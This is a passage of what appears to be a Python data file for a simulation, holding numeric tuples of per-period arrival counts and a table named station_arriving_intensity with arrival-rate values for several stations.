(4, 3, 2, 4, 6, 2, 0, 2, 3, 1, 1, 0, 0, 4, 1, 1, 1, 4, 2, 0, 1, 0, 0, 0, 0, 0), # 96
(3, 3, 7, 2, 3, 1, 2, 1, 2, 1, 0, 0, 0, 4, 2, 4, 1, 3, 0, 1, 0, 0, 1, 0, 0, 0), # 97
(5, 5, 1, 5, 3, 5, 1, 2, 0, 2, 1, 0, 0, 3, 4, 1, 3, 2, 1, 3, 1, 3, 0, 0, 0, 0), # 98
(3, 3, 3, 3, 2, 2, 1, 1, 1, 2, 1, 1, 0, 1, 2, 2, 2, 3, 2, 2, 1, 3, 2, 1, 1, 0), # 99
(6, 4, 2, 1, 2, 4, 2, 4, 0, 0, 2, 0, 0, 7, 5, 4, 2, 3, 0, 1, 1, 3, 0, 0, 1, 0), # 100
(5, 2, 1, 2, 5, 1, 1, 2, 3, 1, 1, 1, 0, 1, 3, 2, 3, 2, 3, 3, 0, 2, 0, 0, 1, 0), # 101
(5, 1, 6, 4, 6, 0, 1, 4, 2, 0, 0, 1, 0, 2, 0, 2, 6, 4, 1, 2, 2, 0, 4, 0, 0, 0), # 102
(0, 2, 1, 6, 3, 1, 0, 0, 1, 0, 0, 0, 0, 5, 3, 2, 0, 3, 2, 0, 0, 1, 1, 0, 0, 0), # 103
(2, 1, 2, 5, 2, 0, 1, 2, 0, 1, 0, 0, 0, 0, 4, 1, 2, 2, 1, 3, 0, 2, 3, 1, 0, 0), # 104
(2, 7, 3, 6, 1, 2, 1, 4, 3, 1, 0, 0, 0, 2, 3, 3, 1, 6, 5, 2, 2, 1, 1, 2, 0, 0), # 105
(7, 4, 3, 5, 4, 2, 0, 0, 2, 0, 0, 0, 0, 5, 3, 1, 2, 5, 0, 3, 1, 3, 0, 2, 0, 0), # 106
(4, 4, 6, 4, 0, 0, 2, 3, 1, 0, 0, 0, 0, 3, 7, 1, 2, 2, 2, 0, 3, 0, 1, 1, 0, 0), # 107
(2, 2, 3, 1, 8, 1, 1, 1, 1, 0, 0, 1, 0, 5, 3, 1, 1, 6, 0, 1, 1, 3, 1, 1, 0, 0), # 108
(4, 4, 2, 3, 3, 1, 1, 0, 0, 1, 0, 1, 0, 7, 5, 1, 0, 1, 0, 2, 1, 2, 1, 1, 1, 0), # 109
(5, 4, 1, 5, 2, 0, 0, 2, 1, 0, 0, 0, 0, 6, 1, 3, 0, 2, 2, 1, 0, 0, 0, 1, 0, 0), # 110
(8, 1, 2, 1, 3, 1, 1, 0, 2, 0, 1, 0, 0, 3, 3, 2, 3, 4, 1, 0, 0, 2, 2, 0, 0, 0), # 111
(4, 4, 5, 1, 3, 1, 3, 1, 0, 0, 1, 0, 0, 4, 6, 1, 3, 6, 2, 1, 0, 1, 1, 0, 0, 0), # 112
(3, 2, 2, 3, 3, 2, 1, 2, 2, 0, 1, 0, 0, 3, 5, 1, 1, 3, 1, 3, 1, 1, 2, 1, 1, 0), # 113
(2, 3, 3, 2, 2, 0, 1, 0, 3, 2, 0, 0, 0, 2, 3, 2, 1, 1, 1, 3, 2, 2, 0, 0, 0, 0), # 114
(2, 4, 2, 4, 2, 4, 2, 3, 1, 1, 1, 0, 0, 3, 4, 2, 0, 1, 1, 0, 0, 0, 2, 0, 0, 0), # 115
(4, 1, 5, 3, 2, 3, 4, 2, 3, 0, 1, 1, 0, 6, 4, 2, 2, 1, 1, 0, 1, 2, 0, 0, 2, 0), # 116
(3, 4, 5, 3, 3, 1, 3, 0, 3, 1, 2, 0, 0, 3, 3, 1, 1, 1, 2, 2, 1, 1, 0, 1, 0, 0), # 117
(3, 3, 0, 1, 1, 1, 2, 0, 4, 1, 1, 1, 0, 5, 2, 7, 1, 1, 2, 0, 2, 4, 0, 1, 0, 0), # 118
(3, 3, 0, 2, 4, 1, 2, 1, 3, 0, 0, 1, 0, 4, 4, 0, 2, 1, 1, 0, 1, 0, 0, 1, 0, 0), # 119
(2, 1, 3, 7, 4, 2, 1, 1, 2, 3, 0, 0, 0, 3, 2, 4, 1, 2, 1, 2, 0, 3, 0, 1, 0, 0), # 120
(5, 4, 2, 3, 2, 1, 1, 3, 2, 0, 1, 0, 0, 4, 5, 2, 2, 3, 1, 2, 0, 0, 1, 0, 1, 0), # 121
(2, 3, 3, 2, 0, 2, 0, 0, 3, 1, 0, 1, 0, 3, 5, 1, 1, 0, 1, 2, 1, 1, 1, 0, 1, 0), # 122
(5, 2, 3, 4, 4, 0, 1, 1, 2, 0, 0, 0, 0, 1, 2, 3, 1, 1, 0, 0, 3, 2, 1, 0, 0, 0), # 123
(3, 2, 3, 2, 1, 2, 3, 3, 3, 2, 0, 1, 0, 6, 4, 1, 1, 0, 0, 1, 3, 3, 0, 0, 0, 0), # 124
(3, 2, 3, 3, 1, 0, 2, 2, 2, 0, 0, 0, 0, 4, 6, 1, 2, 6, 3, 1, 1, 1, 1, 1, 0, 0), # 125
(1, 4, 4, 5, 6, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 2, 7, 2, 2, 0, 1, 1, 0, 0, 0), # 126
(4, 1, 4, 1, 2, 0, 2, 0, 1, 0, 3, 0, 0, 2, 3, 5, 0, 3, 2, 0, 0, 1, 1, 0, 0, 0), # 127
(3, 2, 3, 2, 1, 1, 1, 0, 1, 0, 0, 0, 0, 2, 2, 1, 1, 4, 1, 1, 2, 1, 4, 2, 0, 0), # 128
(7, 0, 4, 5, 1, 2, 0, 1, 1, 0, 0, 0, 0, 3, 1, 2, 1, 1, 1, 0, 2, 0, 0, 1, 1, 0), # 129
(1, 1, 2, 2, 5, 3, 1, 1, 2, 1, 0, 0, 0, 5, 2, 1, 0, 5, 1, 1, 3, 1, 2, 1, 1, 0), # 130
(5, 2, 8, 1, 1, 2, 0, 1, 0, 0, 1, 1, 0, 3, 5, 1, 4, 6, 1, 4, 0, 1, 0, 0, 0, 0), # 131
(2, 2, 3, 4, 3, 0, 1, 1, 3, 2, 1, 0, 0, 4, 5, 2, 0, 1, 2, 2, 0, 0, 0, 0, 0, 0), # 132
(4, 4, 2, 4, 1, 1, 0, 1, 0, 0, 1, 0, 0, 2, 2, 2, 1, 3, 0, 1, 1, 0, 1, 2, 1, 0), # 133
(2, 2, 1, 4, 6, 0, 0, 2, 2, 1, 3, 0, 0, 4, 2, 1, 1, 3, 1, 0, 0, 2, 0, 0, 0, 0), # 134
(1, 2, 3, 3, 5, 0, 1, 2, 0, 2, 1, 0, 0, 2, 3, 4, 3, 1, 0, 2, 1, 3, 1, 1, 0, 0), # 135
(6, 4, 6, 2, 3, 3, 1, 1, 1, 1, 0, 0, 0, 4, 4, 4, 1, 3, 2, 2, 2, 3, 4, 0, 0, 0), # 136
(5, 1, 3, 3, 3, 2, 1, 1, 3, 0, 1, 1, 0, 5, 4, 2, 2, 2, 5, 3, 1, 1, 1, 2, 1, 0), # 137
(6, 1, 4, 1, 3, 4, 2, 2, 0, 2, 0, 0, 0, 3, 3, 0, 0, 2, 1, 0, 0, 0, 1, 0, 0, 0), # 138
(3, 3, 3, 3, 2, 4, 0, 0, 2, 0, 1, 0, 0, 3, 1, 1, 1, 3, 1, 0, 1, 1, 2, 0, 0, 0), # 139
(6, 6, 6, 5, 5, 0, 1, 1, 1, 0, 0, 0, 0, 1, 3, 2, 2, 4, 4, 1, 0, 2, 1, 0, 0, 0), # 140
(4, 4, 2, 4, 3, 0, 1, 2, 1, 1, 0, 1, 0, 3, 5, 1, 0, 8, 1, 2, 0, 1, 1, 1, 0, 0), # 141
(2, 3, 2, 3, 6, 2, 1, 1, 1, 1, 0, 1, 0, 6, 2, 2, 2, 2, 6, 2, 0, 4, 2, 2, 0, 0), # 142
(2, 2, 2, 4, 3, 1, 1, 1, 1, 0, 2, 0, 0, 5, 3, 3, 0, 1, 1, 2, 1, 3, 2, 1, 0, 0), # 143
(3, 0, 2, 4, 4, 1, 3, 1, 0, 0, 0, 1, 0, 4, 2, 0, 1, 1, 1, 1, 2, 0, 1, 0, 0, 0), # 144
(4, 1, 3, 1, 5, 0, 2, 4, 1, 1, 0, 0, 0, 7, 6, 2, 1, 2, 1, 0, 0, 0, 0, 0, 0, 0), # 145
(4, 4, 3, 3, 3, 3, 0, 1, 1, 0, 0, 0, 0, 5, 0, 2, 0, 2, 1, 2, 0, 1, 2, 0, 0, 0), # 146
(2, 1, 2, 1, 3, 1, 1, 1, 1, 0, 0, 0, 0, 6, 3, 2, 0, 2, 0, 1, 0, 2, 1, 1, 0, 0), # 147
(5, 5, 3, 4, 0, 6, 0, 0, 2, 1, 1, 1, 0, 9, 2, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0), # 148
(3, 5, 6, 4, 6, 2, 0, 3, 3, 0, 0, 1, 0, 3, 1, 4, 0, 5, 1, 2, 0, 2, 1, 4, 0, 0), # 149
(4, 0, 3, 1, 3, 1, 2, 0, 1, 0, 0, 1, 0, 3, 2, 2, 0, 5, 0, 1, 0, 0, 0, 1, 0, 0), # 150
(6, 5, 4, 3, 1, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 8, 0, 0, 3, 0, 0, 4, 0, 0), # 151
(0, 1, 1, 4, 0, 0, 1, 0, 0, 2, 0, 0, 0, 3, 2, 3, 0, 2, 0, 0, 0, 6, 0, 1, 0, 0), # 152
(4, 0, 5, 1, 6, 1, 2, 2, 2, 0, 0, 0, 0, 2, 6, 1, 1, 1, 0, 0, 0, 2, 0, 0, 0, 0), # 153
(4, 1, 3, 2, 1, 1, 0, 1, 2, 1, 0, 1, 0, 4, 3, 1, 1, 2, 1, 0, 2, 1, 0, 2, 1, 0), # 154
(4, 2, 3, 3, 6, 3, 2, 1, 0, 0, 0, 0, 0, 4, 0, 0, 3, 0, 2, 1, 1, 1, 0, 1, 0, 0), # 155
(5, 1, 1, 4, 4, 1, 2, 3, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 1, 1, 0, 1, 0, 0, 0, 0), # 156
(4, 1, 3, 3, 4, 3, 3, 1, 1, 2, 1, 0, 0, 3, 1, 3, 0, 5, 0, 4, 0, 1, 2, 0, 0, 0), # 157
(4, 3, 3, 0, 3, 3, 0, 0, 1, 0, 0, 0, 0, 1, 5, 2, 3, 1, 0, 0, 1, 3, 0, 0, 0, 0), # 158
(4, 4, 2, 3, 1, 3, 1, 1, 1, 1, 0, 0, 0, 3, 3, 4, 1, 2, 5, 0, 3, 0, 0, 0, 0, 0), # 159
(1, 4, 3, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 2, 2, 1, 1, 2, 2, 0, 0, 4, 3, 0, 0, 0), # 160
(4, 1, 2, 2, 2, 1, 1, 1, 0, 1, 0, 0, 0, 4, 0, 3, 3, 3, 0, 1, 1, 1, 1, 0, 0, 0), # 161
(2, 1, 5, 0, 3, 2, 1, 0, 3, 0, 1, 0, 0, 3, 1, 2, 0, 4, 1, 1, 0, 0, 3, 0, 0, 0), # 162
(2, 2, 3, 3, 1, 1, 3, 2, 2, 1, 0, 0, 0, 4, 2, 3, 1, 3, 3, 1, 3, 0, 1, 1, 0, 0), # 163
(0, 2, 1, 2, 5, 1, 0, 2, 1, 2, 0, 0, 0, 4, 0, 2, 0, 3, 2, 0, 0, 2, 0, 1, 0, 0), # 164
(2, 1, 2, 5, 2, 3, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 1, 3, 0, 0, 2, 1, 1, 1, 0), # 165
(3, 1, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 2, 2, 3, 1, 0, 3, 1, 1, 1, 0, 1, 0, 0), # 166
(3, 0, 1, 2, 1, 2, 1, 1, 0, 2, 0, 0, 0, 2, 2, 2, 2, 2, 2, 1, 2, 3, 0, 0, 1, 0), # 167
(1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 7, 0, 3, 3, 2, 0, 3, 0, 0, 1, 0, 0, 0), # 168
(5, 3, 4, 2, 0, 1, 1, 0, 1, 0, 0, 0, 0, 2, 0, 0, 3, 1, 1, 0, 2, 1, 0, 1, 0, 0), # 169
(0, 2, 1, 2, 3, 0, 0, 0, 2, 0, 0, 0, 0, 2, 1, 2, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0), # 170
(5, 5, 2, 3, 1, 1, 0, 1, 0, 0, 0, 0, 0, 2, 4, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0), # 171
(1, 3, 1, 1, 2, 0, 1, 0, 0, 1, 0, 0, 0, 4, 5, 1, 2, 2, 1, 0, 0, 2, 0, 0, 0, 0), # 172
(1, 1, 1, 2, 2, 0, 2, 1, 0, 0, 0, 0, 0, 1, 2, 0, 1, 2, 0, 0, 0, 0, 1, 0, 0, 0), # 173
(3, 2, 2, 1, 1, 2, 1, 1, 1, 0, 0, 0, 0, 4, 2, 3, 1, 2, 3, 0, 1, 0, 0, 0, 0, 0), # 174
(0, 0, 2, 3, 4, 0, 1, 0, 0, 1, 0, 0, 0, 2, 3, 4, 1, 4, 0, 0, 1, 0, 0, 1, 0, 0), # 175
(0, 1, 5, 4, 1, 1, 1, 2, 3, 1, 1, 0, 0, 1, 1, 1, 0, 3, 0, 0, 0, 1, 1, 0, 0, 0), # 176
(1, 2, 3, 3, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 3, 3, 0, 4, 1, 0, 0, 0, 0), # 177
(2, 0, 0, 2, 0, 1, 0, 1, 3, 1, 0, 0, 0, 3, 1, 2, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0), # 178
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 179
)
station_arriving_intensity = (
(2.0083462313487073, 2.2101154238772667, 2.0845132918450027, 2.485867109545373, 2.2218742430438447, 1.2554619728149357, 1.6584142461495661, 1.8612704691917692, 2.436039624867203, 1.583206006208948, 1.6821060655542412, 1.9591660313224695, 2.0335520850313453), # 0
(2.1417308608079897, 2.3560242776579035, 2.222138636532061, 2.6500577013106468, 2.3689961349896946, 1.3383934336170222, 1.7677875765054776, 1.9838054891622834, 2.5968981305331638, 1.68759227691086, 1.7932384543824527, 2.088486664325742, 2.1679166589759418), # 1
(2.2746892035918926, 2.5013540683563917, 2.3592169142189654, 2.813595081865918, 2.5155851894998977, 1.420994045804978, 1.8767274031842818, 2.105850099161768, 2.7571147227510195, 1.7915655100082184, 1.9039292595105253, 2.217293060821222, 2.301745931283876), # 2
(2.406703117258625, 2.645528200774579, 2.4952043477279418, 2.9758305630128294, 2.661064670400761, 1.5029362490340452, 1.9848014566591823, 2.226920462997803, 2.916054064368437, 1.8947130793704723, 2.013739364730953, 2.3450742739721844, 2.4345091225016904), # 3
(2.537254459366393, 2.78797007971431, 2.6295571598812146, 3.136115456553028, 2.804857841518597, 1.5838924829594672, 2.0915774674033836, 2.3465327444779662, 3.073080818233083, 1.9966223588670715, 2.12222965383623, 2.4713193569419056, 2.565675453175927), # 4
(2.6658250874734044, 2.9281031099774353, 2.7617315735010073, 3.2938010742881576, 2.946387966679712, 1.6635351872364859, 2.1966231658900894, 2.464203107409837, 3.227559647192624, 2.0968807223674655, 2.228961010618853, 2.595517362893659, 2.694714143853131), # 5
(2.7918968591378666, 3.0653506963658006, 2.8911838114095465, 3.448238728019861, 3.0850783097104175, 1.7415368015203456, 2.299506282592505, 2.5794477156009954, 3.378855214094726, 2.1950755437411034, 2.333494318871313, 2.7171573449907234, 2.821094415079843), # 6
(2.9149516319179876, 3.1991362436812527, 3.017370096429054, 3.598779729549785, 3.2203521344370216, 1.8175697654662883, 2.399794547983834, 2.691782732859021, 3.526332181787058, 2.290794196857435, 2.4353904623861076, 2.8357283563963716, 2.944285487402608), # 7
(3.034471263371974, 3.32888315672564, 3.1397466513817585, 3.744775390679571, 3.3516327046858345, 1.891306518729556, 2.497055692537279, 2.80072432299149, 3.6693552131172824, 2.38362405558591, 2.5342103249557284, 2.950719450273881, 3.063756581367967), # 8
(3.149937611058034, 3.4540148403008093, 3.2577696990898817, 3.8855770232108675, 3.478343284283164, 1.9624195009653935, 2.590857446726048, 2.9057886498059853, 3.8072889709330697, 2.473152493795977, 2.629514790372671, 3.0616196797865256, 3.178976917522465), # 9
(3.2608325325343728, 3.573954699208606, 3.3708954623756497, 4.020535938945315, 3.5999071370553204, 2.030581151829043, 2.680767541023342, 3.0064918771100846, 3.939498118082086, 2.5589668853570857, 2.7208647424294297, 3.167918098097581, 3.2894157164126443), # 10
(3.3666378853592023, 3.6881261382508828, 3.4785801640612863, 4.149003449684559, 3.7157475268286135, 2.0954639109757474, 2.7663537059023664, 3.102350168711366, 4.065347317411997, 2.6406546041386876, 2.8078210649184996, 3.269103758370324, 3.394542198585045), # 11
(3.466835527090725, 3.795952562229479, 3.580280026969016, 4.270330867230245, 3.825287717429351, 2.156740218060748, 2.8471836718363246, 3.1928796884174084, 4.184201231770472, 2.717803024010229, 2.8899446416323737, 3.3646657137680274, 3.493825584586214), # 12
(3.5609073152871504, 3.896857375946248, 3.6754512739210647, 4.383869503384018, 3.9279509726838406, 2.2140825127392896, 2.9228251692984224, 3.2775966000357926, 4.295424524005173, 2.789999518841162, 2.9667963563635475, 3.4540930174539684, 3.586735094962694), # 13
(3.6483351075066865, 3.9902639842030356, 3.763550127739659, 4.488970669947517, 4.023160556418396, 2.2671632346666137, 2.9928459287618647, 3.3560170673740988, 4.398381856963769, 2.8568314625009337, 3.0379370929045137, 3.536874722591424, 3.6727399502610254), # 14
(3.728600761307542, 4.075595791801687, 3.844032811247017, 4.584985678722394, 4.110339732459323, 2.315654823497965, 3.0568136806998503, 3.4276572542399024, 4.4924378934939275, 2.9178862288589964, 3.1029277350477678, 3.6124998823436685, 3.7513093710277525), # 15
(3.8011861342479203, 4.152276203544053, 3.91635554726537, 4.671265841510286, 4.188911764632933, 2.359229718888584, 3.1142961555855906, 3.4920333244407846, 4.5769572964433145, 2.9727511917847984, 3.161329166585805, 3.680457549873976, 3.8219125778094183), # 16
(3.86557308388603, 4.219728624231979, 3.979974558616941, 4.747162470112845, 4.2582999167655355, 2.3975603604937143, 3.1648610838922844, 3.5486614417843274, 4.651304728659594, 3.021013725147787, 3.2127022713111195, 3.740236778345622, 3.8840187911525663), # 17
(3.921243467780082, 4.27737645866731, 4.034346068123952, 4.8120268763317116, 4.317927452683436, 2.4303191879686015, 3.2080761960931405, 3.5970577700781043, 4.7148448529904385, 3.0622612028174148, 3.2566079330162037, 3.791326620921886, 3.9370972316037385), # 18
(3.9676791434882794, 4.3246431116518975, 4.078926298608631, 4.8652103719685265, 4.3672176362129465, 2.4571786409684835, 3.2435092226613578, 3.6367384731296983, 4.766942332283512, 3.0960809986631315, 3.2926070354935515, 3.8332161307660386, 3.9806171197094784), # 19
(4.0043619685688325, 4.360951987987585, 4.113171472893201, 4.906064268824942, 4.405593731180377, 2.4778111591486076, 3.270727894070145, 3.667219714746687, 4.80696182938648, 3.1220604865543837, 3.32026046253566, 3.8653943610413566, 4.01404767601633), # 20
(4.030773800579946, 4.385726492476223, 4.136537813799888, 4.933939878702595, 4.432479001412036, 2.4918891821642144, 3.289299940792704, 3.6880176587366496, 4.834268007147009, 3.139787040360622, 3.339129097935024, 3.8873503649111174, 4.036858121070831), # 21
(4.046396497079832, 4.398390029919658, 4.148481544150914, 4.948188513403135, 4.44729671073423, 2.499085149670547, 3.29879309330224, 3.698648468907166, 4.848225528412766, 3.148848033951297, 3.348773825484136, 3.898573195538596, 4.048517675419531), # 22
(4.052157345337056, 4.399889437585734, 4.149969272976681, 4.949972325102881, 4.451092822413039, 2.5, 3.2999216009037355, 3.6997975308641977, 4.849970493827161, 3.149916909007773, 3.349983214864696, 3.8999590306355736, 4.05), # 23
(4.056404965213662, 4.399014814814815, 4.149725925925926, 4.949752777777778, 4.453243045445941, 2.5, 3.299301525054467, 3.6982, 4.849736666666667, 3.14926024691358, 3.3498498316498324, 3.8996345679012343, 4.05), # 24
(4.060562892084632, 4.397290809327846, 4.149245541838135, 4.949318415637861, 4.455345978237801, 2.5, 3.298079561042524, 3.6950617283950624, 4.849274691358025, 3.1479675354366714, 3.349585359770545, 3.898994055784179, 4.05), # 25
(4.0646308076192135, 4.394743758573389, 4.148534705075447, 4.948674176954732, 4.457401547368442, 2.5, 3.2962746873234887, 3.6904419753086426, 4.84859049382716, 3.14606028349337, 3.349192193540342, 3.8980462734339287, 4.05), # 26
(4.068608393486655, 4.3914, 4.1476, 4.947825, 4.459409679417686, 2.5, 3.2939058823529415, 3.6844, 4.84769, 3.14356, 3.3486727272727275, 3.8968000000000007, 4.05), # 27
(4.0724953313562, 4.387285871056242, 4.146448010973937, 4.946775823045268, 4.461370300965361, 2.5, 3.2909921245864604, 3.6769950617283955, 4.846579135802469, 3.1404881938728852, 3.3480293552812075, 3.895264014631916, 4.05), # 28
(4.0762913028971, 4.382427709190672, 4.145085322359397, 4.94553158436214, 4.463283338591288, 2.5, 3.2875523924796264, 3.6682864197530862, 4.845263827160494, 3.1368663740283496, 3.3472644718792868, 3.893447096479195, 4.05), # 29
(4.079995989778599, 4.376851851851852, 4.143518518518518, 4.944097222222222, 4.4651487188752945, 2.5, 3.2836056644880176, 3.658333333333333, 4.84375, 3.1327160493827164, 3.3463804713804715, 3.8913580246913577, 4.05), # 30
(4.083609073669943, 4.370584636488341, 4.141754183813443, 4.94247767489712, 4.466966368397204, 2.5, 3.279170919067216, 3.6471950617283952, 4.842043580246914, 3.1280587288523094, 3.3453797480982668, 3.8890055784179247, 4.05), # 31
(4.087130236240382, 4.363652400548697, 4.13979890260631, 4.940677880658437, 4.468736213736839, 2.5, 3.2742671346727996, 3.6349308641975315, 4.840150493827161, 3.1229159213534525, 3.344264696346178, 3.886398536808414, 4.05), # 32
(4.090559159159159, 4.356081481481481, 4.13765925925926, 4.938702777777777, 4.470458181474025, 2.5, 3.2689132897603486, 3.6216000000000004, 4.838076666666667, 3.1173091358024694, 3.3430377104377103, 3.8835456790123453, 4.05), # 33
(4.093895524095524, 4.347898216735254, 4.135341838134431, 4.936557304526749, 4.472132198188587, 2.5, 3.263128362785444, 3.6072617283950614, 4.835828024691359, 3.111259881115684, 3.34170118468637, 3.880455784179241, 4.05), # 34
(4.097139012718723, 4.339128943758573, 4.132853223593965, 4.9342463991769545, 4.473758190460348, 2.5, 3.2569313322036635, 3.5919753086419757, 4.833410493827161, 3.1047896662094194, 3.3402575134056613, 3.8771376314586194, 4.05), # 35
(4.100289306698002, 4.3298, 4.1302, 4.931775, 4.475336084869134, 2.5, 3.250341176470588, 3.5758000000000005, 4.83083, 3.0979200000000002, 3.338709090909091, 3.8736000000000006, 4.05), # 36
(4.10334608770261, 4.319937722908093, 4.127388751714678, 4.92914804526749, 4.476865807994769, 2.5, 3.2433768740417976, 3.558795061728395, 4.828092469135803, 3.09067239140375, 3.337058311510164, 3.869851668952904, 4.05), # 37
(4.1063090374017905, 4.3095684499314135, 4.124426063100137, 4.92637047325103, 4.478347286417076, 2.5, 3.2360574033728717, 3.5410197530864203, 4.825203827160494, 3.0830683493369917, 3.3353075695223846, 3.86590141746685, 4.05), # 38
(4.109177837464794, 4.298718518518519, 4.121318518518519, 4.923447222222222, 4.479780446715881, 2.5, 3.2284017429193903, 3.5225333333333335, 4.822170000000001, 3.0751293827160495, 3.3334592592592593, 3.861758024691358, 4.05), # 39
(4.111952169560865, 4.2874142661179695, 4.118072702331961, 4.920383230452675, 4.481165215471008, 2.5, 3.2204288711369324, 3.503395061728396, 4.818996913580247, 3.066877000457248, 3.3315157750342936, 3.8574302697759495, 4.05), # 40
(4.114631715359251, 4.275682030178326, 4.114695198902607, 4.917183436213993, 4.482501519262281, 2.5, 3.212157766481078, 3.4836641975308646, 4.8156904938271605, 3.058332711476909, 3.329479511160993, 3.852926931870142, 4.05), # 41
(4.1172161565292, 4.263548148148149, 4.111192592592594, 4.9138527777777785, 4.483789284669523, 2.5, 3.2036074074074072, 3.4634, 4.812256666666667, 3.0495180246913582, 3.3273528619528623, 3.848256790123457, 4.05), # 42
(4.119705174739957, 4.251038957475995, 4.1075714677640605, 4.910396193415639, 4.485028438272561, 2.5, 3.1947967723715003, 3.4426617283950622, 4.808701358024692, 3.0404544490169183, 3.3251382217234067, 3.8434286236854143, 4.05), # 43
(4.122098451660771, 4.238180795610425, 4.10383840877915, 4.906818621399178, 4.486218906651218, 2.5, 3.185744839828936, 3.4215086419753096, 4.805030493827161, 3.031163493369913, 3.322837984786133, 3.838451211705533, 4.05), # 44
(4.1243956689608865, 4.2250000000000005, 4.1000000000000005, 4.903125, 4.487360616385319, 2.5, 3.1764705882352944, 3.4000000000000004, 4.80125, 3.021666666666667, 3.3204545454545453, 3.833333333333333, 4.05), # 45
(4.126596508309553, 4.211522908093278, 4.096062825788752, 4.8993202674897125, 4.488453494054687, 2.5, 3.1669929960461554, 3.3781950617283956, 4.797365802469136, 3.0119854778235027, 3.3179902980421496, 3.828083767718336, 4.05), # 46
(4.128700651376014, 4.19777585733882, 4.092033470507545, 4.895409362139918, 4.489497466239147, 2.5, 3.1573310417170988, 3.356153086419753, 4.793383827160494, 3.0021414357567444, 3.3154476368624515, 3.82271129401006, 4.05), # 47
(4.130707779829518, 4.183785185185186, 4.087918518518519, 4.891397222222223, 4.490492459518524, 2.5, 3.1475037037037037, 3.333933333333334, 4.78931, 2.992156049382716, 3.312828956228956, 3.8172246913580246, 4.05), # 48
(4.132617575339315, 4.169577229080932, 4.083724554183814, 4.887288786008231, 4.491438400472643, 2.5, 3.137529960461551, 3.3115950617283954, 4.78515024691358, 2.9820508276177415, 3.3101366504551692, 3.8116327389117517, 4.05), # 49
(4.134429719574647, 4.155178326474624, 4.07945816186557, 4.883088991769547, 4.492335215681326, 2.5, 3.12742879044622, 3.2891975308641976, 4.78091049382716, 2.9718472793781436, 3.307373113854595, 3.8059442158207597, 4.05), # 50
(4.136143894204764, 4.140614814814815, 4.075125925925926, 4.8788027777777785, 4.4931828317244, 2.5, 3.11721917211329, 3.2668, 4.776596666666667, 2.961566913580247, 3.304540740740741, 3.8001679012345684, 4.05), # 51
(4.137759780898912, 4.125913031550069, 4.070734430727024, 4.874435082304527, 4.493981175181686, 2.5, 3.1069200839183413, 3.2444617283950614, 4.772214691358025, 2.951231239140375, 3.301641925427111, 3.7943125743026984, 4.05), # 52
(4.139277061326338, 4.1110993141289445, 4.0662902606310025, 4.869990843621399, 4.4947301726330116, 2.5, 3.0965505043169532, 3.222241975308642, 4.767770493827161, 2.9408617649748514, 3.2986790622272104, 3.7883870141746687, 4.05), # 53
(4.140695417156286, 4.0962000000000005, 4.0618, 4.865475, 4.495429750658201, 2.5, 3.086129411764706, 3.2001999999999997, 4.76327, 2.93048, 3.295654545454545, 3.7824, 4.05), # 54
(4.142014530058009, 4.081241426611797, 4.057270233196159, 4.860892489711934, 4.496079835837076, 2.5, 3.075675784717179, 3.178395061728395, 4.758719135802469, 2.920107453132145, 3.292570769422621, 3.7763603109282124, 4.05), # 55
(4.143234081700749, 4.066249931412894, 4.052707544581619, 4.8562482510288065, 4.496680354749464, 2.5, 3.0652086016299527, 3.1568864197530866, 4.754123827160494, 2.909765633287609, 3.2894301284449434, 3.770276726108825, 4.05), # 56
(4.144353753753753, 4.051251851851852, 4.048118518518519, 4.851547222222223, 4.497231233975187, 2.5, 3.0547468409586056, 3.135733333333334, 4.749490000000001, 2.8994760493827165, 3.286235016835017, 3.764158024691358, 4.05), # 57
(4.145373227886272, 4.036273525377229, 4.043509739368999, 4.846794341563786, 4.49773240009407, 2.5, 3.044309481158719, 3.1149950617283952, 4.744823580246914, 2.889260210333791, 3.2829878289063483, 3.7580129858253315, 4.05), # 58
(4.146292185767549, 4.0213412894375855, 4.038887791495199, 4.841994547325103, 4.498183779685938, 2.5, 3.0339155006858713, 3.094730864197531, 4.740130493827161, 2.8791396250571566, 3.27969095897244, 3.7518503886602654, 4.05), # 59
(4.147110309066831, 4.006481481481482, 4.034259259259259, 4.837152777777778, 4.498585299330615, 2.5, 3.0235838779956428, 3.075, 4.7354166666666675, 2.869135802469136, 3.2763468013468016, 3.745679012345679, 4.05), # 60
(4.147827279453366, 3.9917204389574765, 4.02963072702332, 4.832273971193416, 4.498936885607924, 2.5, 3.0133335915436135, 3.0558617283950618, 4.730688024691358, 2.859270251486054, 3.2729577503429357, 3.7395076360310933, 4.05), # 61
(4.148442778596402, 3.977084499314129, 4.025008779149521, 4.827363065843622, 4.499238465097694, 2.5, 3.0031836197853625, 3.0373753086419755, 4.725950493827161, 2.8495644810242347, 3.2695262002743486, 3.7333450388660268, 4.05), # 62
(4.148956488165184, 3.9626, 4.0204, 4.822425000000001, 4.499489964379743, 2.5, 2.9931529411764703, 3.0196000000000005, 4.72121, 2.84004, 3.266054545454546, 3.7272, 4.05), # 63
(4.149368089828959, 3.948293278463649, 4.0158109739369, 4.817464711934157, 4.499691310033899, 2.5, 2.983260534172517, 3.0025950617283956, 4.716472469135803, 2.8307183173296755, 3.2625451801970318, 3.7210812985825337, 4.05), # 64
(4.149677265256975, 3.934190672153635, 4.01124828532236, 4.812487139917696, 4.499842428639987, 2.5, 2.9735253772290813, 2.9864197530864196, 4.711743827160494, 2.821620941929584, 3.2590004988153143, 3.7149977137631454, 4.05), # 65
(4.149883696118478, 3.920318518518519, 4.006718518518519, 4.8074972222222225, 4.499943246777829, 2.5, 2.963966448801743, 2.971133333333334, 4.7070300000000005, 2.8127693827160494, 3.2554228956228957, 3.7089580246913587, 4.05), # 66
(4.149987064082717, 3.9067031550068587, 4.002228257887517, 4.8024998971193416, 4.499993691027252, 2.5, 2.9546027273460824, 2.956795061728396, 4.702336913580247, 2.804185148605396, 3.2518147649332843, 3.7029710105166895, 4.05), # 67
